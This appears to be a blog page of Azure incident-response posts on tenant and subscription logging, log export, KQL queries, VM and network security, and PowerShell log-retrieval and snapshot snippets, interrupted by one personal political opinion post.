
  • Source of Logs in Azure (P2: Tenant/Subscription Logs): A Comprehensive Guide for Incident Response

While the Log Analytics Workspace is an excellent tool for monitoring and analyzing logs in Azure, storing logs in a Storage Account provides a more cost-effective and flexible solution for long-term retention and external access. This setup allows organizations to store logs for extended periods and export them for integration with other tools or services.
Why Export Logs to a Storage Account?
There are several benefits to exporting tenant logs and other Azure logs to a Storage Account:
- Long-Term Retention: You can define a retention policy to keep logs for months or years, depending on compliance and operational requirements.
- Cost Efficiency: Compared to storing everything in a Log Analytics Workspace, which is more costly for extensive data, Storage Accounts offer a lower-cost alternative for long-term log retention.
- Accessibility: Logs stored in a storage account can be accessed through APIs or via tools like Azure Storage Explorer, allowing easy download, transfer, and external analysis.
However, each organization must balance storage needs with costs, as larger volumes of data will increase storage costs over time.
-------------------------------------------------------------------------------------------------------------
Steps to Export Tenant Logs to a Storage Account
Step 1: Set Up Diagnostic Settings to Export Logs
1. Navigate to Diagnostic Settings: In the Azure portal, search for Azure Active Directory and select it. Under the Monitoring section, select Diagnostic settings.
2. Create a New Diagnostic Setting: Click Add diagnostic setting and name your setting (e.g., "TenantLogStorageExport").
3. Select Log Categories: Choose the logs you want to export, such as Audit Logs, Sign-in Logs, and Provisioning Logs.
4. Select Destination: Choose Archive to a storage account, select the storage account where the logs will be stored, then confirm and save the settings.
Once configured, the selected logs will start streaming into the specified storage account.
-------------------------------------------------------------------------------------------------------------
Accessing Logs with Azure Storage Explorer
Azure Storage Explorer is a free, graphical tool that allows you to easily access and manage data in your storage accounts, including logs stored as blobs.
Using Azure Storage Explorer:
1. Download and Install: Install Azure Storage Explorer on your local machine from the link below.
2. Connect to Your Azure Account: Launch Storage Explorer, sign in with your Azure credentials, then browse to your storage account and locate the blobs where your logs are stored (e.g., insights-logs-signinlogs).
3. View and Download Logs: Use the explorer interface to view the logs. You can download these blobs to your local machine for offline analysis, or even automate log retrieval using tools like AzCopy or Python scripts (a PowerShell sketch follows below).
Logs are typically stored in a hierarchical structure, with each log file containing valuable data in JSON or CSV formats.
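As an illustration, here is a minimal PowerShell sketch of automated blob retrieval, assuming the Az and Az.Storage modules are installed; the resource group, account, and destination path are placeholder names:

Connect-AzAccount
# "LogsRG" and "tenantlogstore" are placeholder names; substitute your own
$ctx = (Get-AzStorageAccount -ResourceGroupName "LogsRG" -Name "tenantlogstore").Context

# List the sign-in log blobs, then download each one for offline analysis
$blobs = Get-AzStorageBlob -Container "insights-logs-signinlogs" -Context $ctx
foreach ($blob in $blobs) {
    Get-AzStorageBlobContent -Blob $blob.Name -Container "insights-logs-signinlogs" -Destination "C:\Cases\TenantLogs\" -Context $ctx
}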
Examples of Log Types in Storage Accounts
Here are some common logs that you might store in your storage account:
- insights-logs-signinlogs: Logs of all user and service sign-in activities.
- insights-logs-auditlogs: Logs of administrative changes such as adding or removing users, apps, or roles.
- insights-logs-networksecuritygrouprulecounter: Tracks network security group rules and counters.
- insights-logs-networksecuritygroupflowevent: Monitors NSG traffic flows.
These logs are stored as blobs, while certain logs (e.g., OS logs) might be stored in tables within the storage account.
https://azure.microsoft.com/en-us/products/storage/storage-explorer/
https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log-schema#schema-from-storage-account-and-event-hubs
-------------------------------------------------------------------------------------------------------------
Sending Logs to Event Hub for External Systems
If you need to export tenant logs or other logs to a non-Azure system, Event Hub is a great option. Event Hub is a real-time data ingestion service that can process millions of events per second and is often used to feed external systems such as SIEMs (Security Information and Event Management).
How to Configure Event Hub Export:
1. Create Event Hub: Set up an Event Hub within the Azure Event Hubs service.
2. Configure Diagnostic Settings: Just as you did for the storage account, go to Diagnostic settings for Azure Active Directory and select Stream to an event hub as the destination. Enter the namespace and event hub name.
This setup allows you to forward Azure logs in real time to any system capable of receiving data from Event Hub, such as a SIEM or a custom log analytics platform.
https://azure.microsoft.com/en-us/products/event-hubs/
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/howto-stream-logs-to-event-hub?tabs=splunk
-------------------------------------------------------------------------------------------------------------
Leveraging Microsoft Graph API for Log Retrieval
In addition to Storage Accounts and Event Hubs, Azure also supports the Microsoft Graph API for retrieving tenant logs programmatically. This API allows you to pull log data directly from Azure and Microsoft 365 services. The Graph API supports many programming languages, including Python, C#, and Node.js, making it highly flexible. It's commonly used to integrate Azure logs into custom applications or third-party systems.
https://developer.microsoft.com/en-us/graph
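As one hedged illustration, the Microsoft Graph PowerShell SDK exposes these logs as cmdlets; a minimal sketch, assuming the Microsoft.Graph module is installed and your account holds the AuditLog.Read.All permission:

Connect-MgGraph -Scopes "AuditLog.Read.All"

# Pull recent sign-in and directory audit events through Graph
$signIns = Get-MgAuditLogSignIn -Top 50
$audits  = Get-MgAuditLogDirectoryAudit -Top 50

# Quick triage view: who signed in, from where, and when
$signIns | Select-Object UserPrincipalName, IpAddress, CreatedDateTime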
-------------------------------------------------------------------------------------------------------------
All of the above logs are part of the tenant logs. Let's start with the second log category: Subscription Logs.
What are Subscription Logs?
Subscription logs track and log all activities within your Azure subscription. They record changes made to resources, providing a clear audit trail and insight into activity across the subscription. The primary information recorded includes details on operations, identities involved, success or failure status, and IP addresses.
Accessing Subscription Logs
Subscription logs are available under the Activity log in the Azure portal. You can use the logs in multiple ways:
- View them directly in the Azure portal for a quick, interactive inspection.
- Store them in a Log Analytics workspace for advanced querying and long-term retention.
- Archive them in a storage account, useful for maintaining a long-term log history.
- Forward them to a SIEM (Security Information and Event Management) solution via Azure Event Hub for enhanced security monitoring and correlation.
To access the logs in the Azure portal, use the search bar to look for Activity log. This will provide a quick summary view of activities within the portal.
https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=powershell
-------------------------------------------------------------------------------------------------------------
Key Elements of the Subscription Log Schema
Each activity log entry has several key fields that can help in monitoring and troubleshooting. When an action, such as creating a new virtual machine (VM), is logged, the following fields provide detailed information:
- resourceId: A unique identifier for the resource that was acted upon, allowing precise tracking of the specific VM, storage account, or network security group.
- operationName: Specifies the action taken on the resource. For example, creating a VM might appear as MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE.
- resultType and resultSignature: These fields show whether the operation succeeded, failed, or was canceled, with additional error codes or success indicators in resultSignature.
- callerIpAddress: The IP address from which the action originated, identifying the source of the request.
- correlationId: A unique GUID that ties together all sub-operations in a single request, allowing you to trace a sequence of actions as part of a single change or request.
- claims: Contains identity details of the principal making the change, including any associated authentication data. This can include fields from an identity provider like Azure AD, giving insight into the user or service making the request.
Each log entry captures critical details that aid in understanding who, what, when, and where changes were made.
-------------------------------------------------------------------------------------------------------------
Subscription Log Access Options
Azure offers different access and filtering methods for subscription logs. Here's a breakdown of how you can utilize them effectively:
- Azure Portal: The Azure portal offers a quick, visual way to explore logs. You can select a subscription, set the event severity level (e.g., Critical, Error, Warning, Informational), and define a timeframe for the log entries you need. The Export Activity Logs option on the top menu or the Diagnostic Settings on the left allows you to set up data export or view diagnostic logs.
- Log Analytics Workspace: The Log Analytics workspace offers a more robust and flexible environment for log analysis. By sending your logs here, you can perform advanced queries, create dashboards, and set up alerts. This workspace enables centralized log management, making it an ideal choice for larger organizations or those with specific compliance requirements.
- Programmatic Access: Using the PowerShell cmdlet Get-AzLog or the Azure CLI with az monitor activity-log, you can query the activity logs programmatically (see the sketch after this list). This is useful for automated scripts or integrating logs into third-party solutions.
- Event Hub Integration: For real-time analysis, integrate subscription logs with Event Hub and forward them to a SIEM for security insights and anomaly detection. This setup is beneficial for organizations that require constant monitoring and incident response.
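For instance, a minimal sketch of the programmatic route (assuming the Az module; the one-day window is illustrative):

# Pull the last 24 hours of activity log entries for the current subscription
$entries = Get-AzLog -StartTime (Get-Date).AddDays(-1) -DetailedOutput

# Show who performed each operation, and whether it succeeded
$entries | Select-Object Caller, EventTimestamp,
    @{n='Operation';e={$_.OperationName.Value}},
    @{n='Status';e={$_.Status.Value}}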
https://learn.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-12.4.0#retrieve-activity-log
https://learn.microsoft.com/en-us/cli/azure/service-page/monitor?view=azure-cli-latest#view-activity-log
-------------------------------------------------------------------------------------------------------------
Subscription Logs in a Log Analytics Workspace
For detailed analysis, it's best to set up a Log Analytics workspace. This enables centralized log storage and querying capabilities, combining subscription logs with other logs (such as Azure Active Directory (Entra ID) logs) for a comprehensive view. The setup process is identical to the one for the tenant logs: select the log categories you wish to save and the Log Analytics workspace to send them to.
Subscription Log Categories
The main log categories available are:
- Administrative: Tracks actions related to resources, such as creating, updating, or deleting resources via Azure Resource Manager.
- Security: Logs security alerts generated by Azure Security Center.
- Service Health: Reports incidents affecting the health of Azure services.
- Alert: Logs triggered alerts based on predefined metrics, such as high CPU usage.
- Recommendation: Records Azure Advisor recommendations for resource optimization.
- Policy: Logs policy events for auditing and enforcing subscription-level policies.
- Autoscale: Contains events from the autoscale feature based on usage settings.
- Resource Health: Provides resource health status, indicating whether a resource is available, degraded, or unavailable.
-------------------------------------------------------------------------------------------------------------
Querying Subscription Logs in Log Analytics
The logs are stored in the AzureActivity table in Log Analytics. Here are some example queries:
Identify Deleted Resources:
AzureActivity
| where OperationNameValue contains "DELETE"
This query is useful for investigating deletions, such as a scenario where a malicious actor deletes a resource group, causing all contained resources to be deleted.
Track Virtual Machine Operations:
AzureActivity
| where OperationNameValue contains "COMPUTE"
| distinct OperationNameValue
This query lists unique operations related to virtual machines, helpful for getting an overview of VM activity.
Count VM Operations:
AzureActivity
| where OperationNameValue contains "COMPUTE"
| summarize count() by OperationNameValue
By counting operations, this query provides insights into the volume of VM activities, which can reveal patterns such as frequent VM creation or deletion.
-------------------------------------------------------------------------------------------------------------
Archiving and Streaming Logs
To save logs for long-term storage or send them to a SIEM, configure diagnostic settings to specify the storage account or Event Hub for archiving and real-time streaming. Logs stored in a storage account appear in a structured format, often in JSON files within deeply nested directories, which can be accessed and processed using tools like Azure Storage Explorer.
By effectively leveraging subscription logs and these configurations, Azure administrators can enhance monitoring, identify security issues, and ensure accountability in their environments.
-----------------------------------------------------------------------------------------------------------
We will continue in the next blog. Until then, stay safe and keep learning.
Akash Patel

  • A New Era of Global Stability

    As someone living outside the United States, I often hear people say that U.S. elections don’t impact us directly. But I see things differently. For years, I've closely followed the political landscape in the U.S., especially after Donald Trump’s 2016 victory, which brought hope and a new vision for many of us around the world. Through times of uncertainty, I’ve always believed that strong U.S. leadership can inspire stability, innovation, and economic growth that reach far beyond its borders. In the last few years, the world has faced many challenges—economic uncertainty, conflicts, and industry disruptions that have deeply affected global markets, including the IT sector. It’s been hard to watch as so many jobs and dreams have been impacted. This is why, as I watched the U.S. election results with hope, I couldn’t help but feel that leadership in the U.S. can make a real difference in restoring peace, stability, and opportunity. For me, Trump represents a leader who prioritizes a stable economy and jobs, both in the U.S. and worldwide. His policies seem aimed at revitalizing the workforce, investing in the economy, and, hopefully, creating a ripple effect of opportunity that reaches countries like mine. The IT sector, which often feels the impact of global uncertainty, stands to gain from policies that promote growth and open doors to innovation. I truly believe that under strong leadership, we have a chance to regain lost ground, make the job market more resilient, and protect the dreams of so many talented professionals. My hope is that this leadership can reduce tensions, stabilize markets, and foster an environment where technology and innovation can thrive without constant fear of disruption. I believe that people like us, who are watching from afar, have reason to feel hopeful. It’s not just about one country or one election—it’s about the promise of a future where our global workforce can thrive, where ideas can flourish, and where peace and opportunity are within reach for people everywhere. So, as I look forward, I’m choosing to stay positive and hopeful. I believe that with the right leadership, we can create a more secure and stable world—one where professionals in IT and other industries can look to the future with confidence. Together, I hope we can build a world where dreams are realized, opportunities are abundant, and peace prevails. @realDonaldTrump, #donaldtrump, #trump, @ElonMuskNewsOrg, #Elonmusk , #Elon, #musk -------------------------------------Make World Great Again------------------------------------

  • Source of Logs in Azure (P1: Tenant Logs): A Comprehensive Guide for Incident Response

In cloud-based environments like Azure, maintaining comprehensive visibility over all activities is essential for securing your infrastructure and responding effectively to incidents. One of the most critical tools in your security arsenal is logging. Azure provides a variety of log sources, but not all are enabled by default. Understanding where these logs come from, how to access them, and how to store them can significantly improve your ability to investigate incidents and mitigate risks.
The Five Key Azure Log Sources
Azure collects logs from various levels of the cloud infrastructure, each serving a unique role in monitoring and security. Here are the five primary log sources you need to be aware of:
1. Tenant Logs
2. Subscription Logs
3. Resource Logs
4. Operating System Logs
5. Application Logs
Let's explore each of these in more detail.
- Tenant: Turned on by default. Used to detect password spray attacks or other credential abuses.
- Subscription: Turned on by default. Used to analyze the creation, deletion, and start/stop of resources in cases such as crypto-mining VM incidents or mass deletion for sabotage.
- Resource: Turned off by default. Used to log network traffic flow and file storage access for cases such as data exfiltration.
- Operating System: Turned off by default. Used to log operating system events, which can show lateral movement.
- Application: Turned off by default. Used to create custom logs at the discretion of developers. Azure includes a log for IIS that can be used to show web server attacks.
-------------------------------------------------------------------------------------------------------------
Why Proper Logging Matters in Incident Response
In many cases, when an organization is called to respond to a security incident, the first challenge is discovering that key logs were never configured or stored. This leaves responders with limited information and hampers their ability to fully understand the attack. Why is this important?
- Comprehensive Monitoring: Many log sources, such as resource and OS logs, must be enabled manually. Without these logs, crucial events like unauthorized access or file manipulation might go unnoticed.
- Cost of Storage: Logs must be stored in Azure, often in a Log Analytics Workspace or similar storage solution, which incurs additional costs. Without proper budgeting and planning, organizations might avoid enabling these logs due to perceived costs, leaving them vulnerable.
- Log Retention: Depending on your configuration, logs might only be stored for a short period before being overwritten. Having a strategy in place for exporting and storing logs in a secure, centralized location (such as a SIEM system) is essential.
The ideal setup is to continuously export these logs to a SIEM, where they can be stored long-term and analyzed even after an incident has occurred. This prevents attackers from covering their tracks by deleting logs stored locally in Azure.
-------------------------------------------------------------------------------------------------------------
Log Analytics Workspace: Centralizing Your Logs for Efficient Analysis
Azure provides a Log Analytics Workspace as a centralized repository where logs from multiple sources, both Azure-based and non-Azure, can be aggregated and analyzed. This workspace organizes logs into tables, with each data source creating its own table.
Key benefits of using a Log Analytics Workspace include:
- Scalability: The default workspace can handle up to 6GB of logs per minute and store up to 4TB of data per day. This is generally sufficient for most organizations, though custom workspaces can be created for larger log volumes.
- Access Control: You can set granular permissions based on security roles, ensuring that sensitive logs are only accessible to authorized personnel.
By setting up a Log Analytics Workspace, you can automate the collection of logs from all relevant sources and integrate with Azure Monitor for real-time alerting and analysis.
https://learn.microsoft.com/en-us/azure/azure-monitor/logs/workspace-design
https://learn.microsoft.com/en-us/azure/azure-monitor/logs/manage-access?tabs=portal
-------------------------------------------------------------------------------------------------------------
Setting Up a Log Analytics Workspace in Azure
A Log Analytics Workspace allows you to aggregate logs from multiple Azure services and third-party tools into one place. Here's how to set it up:
Step 1: Sign in to the Azure Portal. Go to the Azure Portal and sign in with your credentials.
Step 2: Search for 'Log Analytics Workspaces'. In the search bar at the top, type Log Analytics Workspaces and select the service from the list.
Step 3: Create a New Workspace. Click New to create a new workspace and enter the required details:
- Subscription: Select your Azure subscription.
- Resource Group: Choose an existing resource group or create a new one.
- Workspace Name: Name your workspace (e.g., "SecurityLogsWorkspace").
- Region: Choose the region where you want the workspace to reside.
Step 4: Review and Create. After entering all details, click Review + Create and then Create to deploy your Log Analytics Workspace.
This workspace will serve as a centralized location for all logs and can be expanded to include tenant logs, subscription logs, resource logs, and more. For more details on creating a Log Analytics workspace, visit Microsoft's official documentation.
https://learn.microsoft.com/en-us/azure/azure-monitor/logs/quick-create-workspace?tabs=azure-portal
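The same setup can also be scripted; a minimal sketch, assuming the Az.OperationalInsights module and placeholder resource-group and region values:

# Placeholder values: adjust the resource group, name, and region to your environment
$params = @{
    ResourceGroupName = "SecurityRG"
    Name              = "SecurityLogsWorkspace"
    Location          = "eastus"
    Sku               = "PerGB2018"   # common pay-as-you-go pricing tier
}
New-AzOperationalInsightsWorkspace @params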
-------------------------------------------------------------------------------------------------------------
Tenant Logs: Overview and Access
Tenant logs provide information about operations conducted by tenant-wide services like Azure Active Directory (AAD, now Entra ID). These logs are essential for monitoring security-related events such as sign-ins, user provisioning, and audit trails. The key AAD logs include:
- Audit Logs: Track changes and configuration updates across the tenant.
- Sign-in Logs: Provide detailed records of user login activity, including success, failure, and multi-factor authentication (MFA) usage.
Viewing Tenant Logs in the Azure Portal
Sign-in Logs: To quickly check sign-in activity, go to the Azure Portal and navigate to Azure Active Directory (Entra ID) > Sign-ins. Here you can view sign-in logs for the last 30 days, showing details such as user, date, status (success, failure, interrupted), and the IP address used.
https://learn.microsoft.com/en-us/entra/fundamentals/how-to-manage-user-profile-info
Audit Logs: Similarly, go to Azure Active Directory (Entra ID) > Audit Logs to see tenant-wide changes, such as user account updates and administrative configuration changes.
However, the Azure portal limits logs to the last 30 days, making it unsuitable for long-term forensic analysis or detailed investigations. For comprehensive analysis and historical data retention, storing logs in a Log Analytics Workspace is a much better approach.
-------------------------------------------------------------------------------------------------------------
Exporting Azure Active Directory Logs to a Log Analytics Workspace (AAD has since been renamed Entra ID)
To take full advantage of tenant logs, including AAD audit and sign-in logs, you should configure the logs to be stored in your Log Analytics Workspace. This allows for extended retention periods, deeper analysis, and cross-correlation with other logs.
Step-by-Step Guide to Exporting AAD (Entra ID) Logs
Step 1: Navigate to Azure Active Directory (Entra ID). In the Azure Portal, search for and select Azure Active Directory from the services list.
Step 2: Configure Diagnostic Settings. From the AAD menu, select Diagnostic settings, then click Add diagnostic setting to configure where the logs will be stored.
-------------------------------------------------------------------------------------------------------------
Selecting AAD (Entra ID) Logs and Setting Up the Log Analytics Workspace
After setting up your Log Analytics Workspace (as described in previous steps), the next task is to configure which AAD logs you want to capture and send to the workspace. Azure provides several types of logs that you can export for analysis:
- Audit Logs: Logs changes such as adding or removing users, groups, roles, policies, and applications.
- Sign-in Logs: Tracks sign-in activities, including User sign-in (direct user login events), Non-interactive sign-in (background sign-ins, such as token refreshes), Service Principal sign-in (sign-ins performed by service principals, used by applications), and Managed Identity sign-in (sign-ins for managed identities).
- Provisioning Logs: Tracks user, group, and role provisioning activities performed by Azure AD.
- ADFS Sign-in Logs: Monitors federation sign-in events through Active Directory Federation Services (ADFS).
- Identity Protection Logs: Tracks risky users and events, including RiskyUsers, UserRiskEvents, RiskyServicePrincipals, and ServicePrincipalRiskEvents.
- Network Access Traffic Logs: Logs network traffic for policy and risk management, including user experience data.
To set this up:
1. Navigate to Diagnostic Settings: Go to the Azure Active Directory (Entra ID) service in the Azure portal. In the left menu, click Diagnostic settings and then select Add diagnostic setting.
2. Choose Logs to Export: Select the categories of logs you want to export to the Log Analytics Workspace (e.g., AuditLogs, SignInLogs, ProvisioningLogs), and specify the Log Analytics Workspace where these logs will be stored.
3. Save Settings: Confirm the logs you've selected and save the diagnostic setting.
Once configured, these logs will be automatically sent to the designated Log Analytics Workspace for long-term storage and analysis.
https://learn.microsoft.com/en-us/entra/id-protection/
-------------------------------------------------------------------------------------------------------------
Managing Storage Costs
While it may be tempting to store all available logs, storage costs can accumulate quickly, especially for large organizations with a lot of activity.
One cost-saving measure is to use Azure Storage Accounts for logs that don't require constant querying but need to be archived for compliance or later use. For critical logs, such as sign-in and audit logs, continuous export to the Log Analytics Workspace is recommended for monitoring real-time activity and performing incident response. However, less frequently accessed logs can be stored more cost-effectively in a storage account.
-------------------------------------------------------------------------------------------------------------
Querying AAD (Entra ID) Logs Using Kusto Query Language (KQL)
Once AAD logs are flowing into your Log Analytics Workspace, you can use Kusto Query Language (KQL) to search, filter, and analyze log data. KQL is a powerful language for querying logs and has a syntax similar to SQL, making it approachable for those familiar with databases.
Example of a Simple KQL Query:
SigninLogs
| where TimeGenerated > ago(1d)
| where ResultType == 0
- SigninLogs: The first line specifies the log type you want to search.
- TimeGenerated > ago(1d): Filters the query to only include logs from the past 24 hours.
- ResultType == 0: Filters for successful logins (ResultType 0 corresponds to success).
This simple query helps you identify all successful sign-in attempts in the last 24 hours. KQL also allows for more complex queries involving joins, aggregations, and visualizations, making it a robust tool for analyzing log data. For more details on KQL, visit Microsoft's KQL Documentation.
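The same query can also be run outside the portal; a minimal PowerShell sketch, assuming the Az.OperationalInsights module and placeholder workspace names:

# Resolve the workspace (placeholder names) and run the KQL query remotely
$ws  = Get-AzOperationalInsightsWorkspace -ResourceGroupName "SecurityRG" -Name "SecurityLogsWorkspace"
$kql = 'SigninLogs | where TimeGenerated > ago(1d) | where ResultType == 0'
$result = Invoke-AzOperationalInsightsQuery -WorkspaceId $ws.CustomerId -Query $kql
$result.Results | Select-Object UserPrincipalName, IPAddress, TimeGenerated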
-------------------------------------------------------------------------------------------------------------
Using Pre-Built Queries in Log Analytics
Microsoft also provides a set of pre-built queries for common scenarios, such as analyzing sign-ins, audit events, or identifying risky behavior in your tenant. These queries serve as templates, which you can customize based on your specific investigation needs. They are particularly useful when first starting with KQL, as they provide a foundation for your own queries and ensure you're asking the right questions of your data.
To use these pre-built queries:
1. Open your Log Analytics Workspace in the Azure portal.
2. Navigate to the Logs section.
3. Search for the desired query in the query library, or start with a template and adjust it to suit your needs.
https://learn.microsoft.com/en-us/azure/azure-monitor/logs/log-analytics-overview
-------------------------------------------------------------------------------------------------------------
We will continue in the next blog. Until then, stay safe and keep learning.
Akash Patel

  • Azure Compute: Understanding VM Types and Azure Network Security for Incident Response

Microsoft Azure provides a wide range of compute services, organized based on workload types and categorized as Infrastructure as a Service (IaaS), Platform as a Service (PaaS), or Software as a Service (SaaS). For incident response and forensic investigations, the focus is typically on virtual machines (VMs) and the related networking infrastructure.
-----------------------------------------------------------------------------------------------------------
Virtual Machines: Types and Applications
Azure offers various classes of virtual machines tailored for different workloads, all with specific performance characteristics. Here's a breakdown of the most common VM types you'll encounter during an investigation:
- Series A (Entry Level): Development workloads, low-traffic websites. Examples: A1 v2, A2 v2.
- Series B (Burstable): Low-cost VMs with the ability to "burst" to higher CPU performance when needed. Examples: B1S, B2S.
- Series D (General Purpose): Optimized for most production workloads. Examples: D2as v4, D2s v4.
- Series F (Compute Optimized): Compute-intensive workloads, such as batch processing. Examples: F1, F2s v2.
- Series E, G, and M (Memory Optimized): Memory-heavy applications like databases. Examples: E2a v4, M8ms.
- Series L (Storage Optimized): High-throughput and low-latency applications. Examples: L4s, L8s v2.
- Series NC, NV, ND (Graphics Optimized): Visualization, deep learning, and AI workloads. Examples: NC6, NV12s.
- Series H (High Performance Computing): Applications such as genomic research and financial modeling. Examples: H8, HB120rs v2.
https://azure.microsoft.com/en-us/pricing/details/virtual-machines/windows/
https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/
VM Storage: Managed Disks
Managed Disks in Azure operate similarly to physical disks but come with a few key distinctions relevant for incident response.
Types of Managed Disks:
- Standard HDD: Slow, low-cost.
- Standard SSD: Standard for most production workloads.
- Premium SSD: High performance, better suited for intensive workloads.
- Ultra Disk: Highest performance for demanding applications.
Each VM can have multiple managed disks, including an OS disk, a temporary disk (for short-term storage), and one or more data disks. Forensics often involves snapshotting the OS disk of a compromised VM and attaching that snapshot to a new VM for further analysis (a sketch of this step follows below). Costs are associated with:
- Disk type and size.
- Snapshot size (critical for investigations).
- Outbound data transfers (when retrieving forensic data).
- I/O operations (transaction costs).
https://learn.microsoft.com/en-us/azure/virtual-machines/managed-disks-overview
https://learn.microsoft.com/en-us/azure/virtual-machines/disks-types
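A minimal sketch of that snapshot step in PowerShell, assuming the Az.Compute module; the VM, resource group, and snapshot names are placeholders:

# Locate the compromised VM (placeholder names) and its OS disk
$vm   = Get-AzVM -ResourceGroupName "ProdRG" -Name "CompromisedVM"
$disk = Get-AzDisk -ResourceGroupName "ProdRG" -DiskName $vm.StorageProfile.OsDisk.Name

# Create a point-in-time snapshot of the OS disk for forensic analysis
$cfg = New-AzSnapshotConfig -SourceUri $disk.Id -Location $disk.Location -CreateOption Copy
New-AzSnapshot -ResourceGroupName "ProdRG" -SnapshotName "CompromisedVM-osdisk-snap" -Snapshot $cfg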
-----------------------------------------------------------------------------------------------------------
Azure Virtual Network (VNet): The Glue Behind Azure Resources
An Azure Virtual Network (VNet) allows Azure resources like VMs to communicate with each other and with external networks. During an incident response, it's essential to understand the network topology to see how resources were connected, what traffic was allowed, and where vulnerabilities might have existed.
Key points about VNets:
- Private Addressing: Azure assigns a private IP range (typically starting with 10.x.x.x).
- Public IP Addresses: Required for internet communication, but come with extra charges.
- On-Premises Connectivity: Point-to-Site VPN connects individual computers to Azure; Site-to-Site VPN connects an on-premises network to Azure; Azure ExpressRoute provides private connections that bypass the internet.
https://learn.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview
-----------------------------------------------------------------------------------------------------------
Network Security Groups (NSG): Traffic Control and Incident Response
NSG Overview: Azure automatically creates NSGs to protect resources, like virtual machines (VMs), by allowing or blocking traffic based on several criteria:
- Source/Destination IP: IP addresses from which the traffic originates or to which it is sent.
- Source/Destination Port: The network ports involved in the connection.
- Protocol: The communication protocol (e.g., TCP, UDP).
Rule Prioritization: NSG rules are processed in order of their priority, with lower numbers having higher priority. Custom rules have priorities ranging from 100 to 4096, while Azure-defined rules have priorities in the 65000 range.
Incident Response Tip: Ensure that firewall rules are correctly prioritized. A common issue during investigations is discovering that a misconfigured or improperly prioritized rule allowed malicious traffic to bypass protections (a rule-review sketch follows below).
Flow Logs: Network flow logs, which capture traffic information, are essential for understanding traffic patterns and investigating suspicious activity. Flow logs are generated every minute, and the first 5GB per month is free. After that, the cost is $0.50 per GB plus storage charges.
Example: If an attack involved unauthorized access through a compromised port, flow logs would help you trace the origin and nature of the traffic, providing critical forensic data.
https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview
https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview#network-security-groups
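A minimal sketch of that rule review in PowerShell, assuming the Az.Network module; the resource-group name is a placeholder:

# Review custom rules for every NSG in a resource group, ordered by priority
Get-AzNetworkSecurityGroup -ResourceGroupName "ProdRG" | ForEach-Object {
    Write-Output ("NSG: " + $_.Name)
    $_.SecurityRules | Sort-Object Priority |
        Select-Object Name, Priority, Direction, Access, SourceAddressPrefix, DestinationPortRange
}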
-----------------------------------------------------------------------------------------------------------
Network Virtual Appliances (NVA): Advanced Network Security
Azure provides additional options for advanced traffic management and security beyond basic NSGs:
- Azure Load Balancer: Distributes incoming network traffic across multiple resources to balance load.
- Azure Firewall: Offers advanced filtering, including both stateful network and application-layer inspections.
- Application Gateway: Protects web applications by filtering out vulnerabilities like SQL injection and cross-site scripting (XSS).
- VPN Gateway: Connects on-premises networks securely to Azure.
Many third-party Network Virtual Appliances are also available on the Azure Marketplace, such as firewalls, VPN servers, and routers, which can be vital components in your investigation.
https://azuremarketplace.microsoft.com/en-us/marketplace/apps/category/networking?page=1&subcategories=all
-----------------------------------------------------------------------------------------------------------
Azure Storage: Central to Forensics and Logging
Azure storage accounts are integral to how logs and other data are stored during investigations. Proper storage setup ensures data retention and availability for analysis.
Storage Account Types:
- Blob Storage: Scalable object storage for unstructured data, such as logs or multimedia.
- File Storage: Distributed file system storage.
- Queue Storage: For message storage and retrieval.
- Table Storage: NoSQL key-value store, now part of Azure Cosmos DB.
Blob Storage: Blobs (Binary Large Objects) are highly versatile and commonly used for storing large amounts of unstructured data, such as logs during forensic investigations. Blobs come in three types:
- Block Blobs: Ideal for storing text and binary data; can handle up to 4.75TB per file.
- Append Blobs: Optimized for logging, where data is appended rather than overwritten.
- Page Blobs: Used for random-access data, like Virtual Hard Drive (VHD) files.
Direct Access and Data Transfers: With the appropriate permissions, data stored in blob storage can be accessed over the internet via HTTP or HTTPS. Azure provides tools like AzCopy and Azure Storage Explorer to facilitate the transfer of data in and out of blob storage.
Example: Investigators may need to download logs or snapshots stored in blobs for offline analysis. Using AzCopy or Azure Storage Explorer, these files can be easily transferred for examination.
-----------------------------------------------------------------------------------------------------------
How This Script Helps
VM Information for Analysis: The extracted data (VM ID and VM size) is essential for identifying and analyzing the virtual machines involved in an incident.

# Pull detailed activity log entries for the compute resource provider
$results = Get-AzLog -ResourceProvider "Microsoft.Compute" -DetailedOutput

# Walk each entry's properties and extract the VM ID and size from the response body
$results.Properties | ForEach-Object { $_ } | ForEach-Object {
    $contents = $_.Content
    if ($contents -and $contents.ContainsKey("responseBody")) {
        $fromJson = ($contents.responseBody | ConvertFrom-Json)
        $newObj = New-Object psobject
        $newObj | Add-Member NoteProperty VmId $fromJson.properties.vmId
        $newObj | Add-Member NoteProperty VmSize $fromJson.properties.hardwareProfile.vmSize
        $newObj
    }
}
-----------------------------------------------------------------------------------------------------------
Conclusion
In Azure, combining effective Network Security Group (NSG) management with automated VM log extraction provides essential visibility for incident response. Understanding traffic control through NSGs and using PowerShell scripts for VM log retrieval empowers organizations to investigate security incidents efficiently, even without advanced security tools like a SIEM.
Akash Patel

  • "Azure Resource Groups and Role-Based Access Control: A Comprehensive Guide for Incident Response and Forensics in the Cloud"

Microsoft Azure is a vast ecosystem of cloud-based services and tools, offering almost limitless possibilities for building, managing, and scaling applications. But when it comes to incident response or forensic investigation, the Azure landscape can feel overwhelming. To make things clearer, let's focus on the essential elements you're most likely to encounter during such operations.
Understanding Azure's Structure: The Building Blocks
Think of Azure as a layered architecture, with each layer adding a distinct function that contributes to how an organization manages and controls its cloud resources. Here are the key components:
1. Azure Tenant
Picture the tenant as the foundation of a house: the basis for everything else. It represents the entire organization and is associated with an Azure Active Directory (AAD/Entra ID) instance, which handles identity and access management. If you're responding to a security breach, this is where you'll likely start your investigation, analyzing user and group permissions in AAD to find any clues about unauthorized access.
2. Management Groups
In larger enterprises, it's common to have many different projects running across Azure, each with its own budget, team, and purpose. To keep things tidy, management groups help organize multiple subscriptions under a single umbrella. For example, a company could have different management groups for its production and development environments. This setup lets administrators apply policies across all relevant subscriptions in one go, a time-saving feature that also helps standardize security practices.
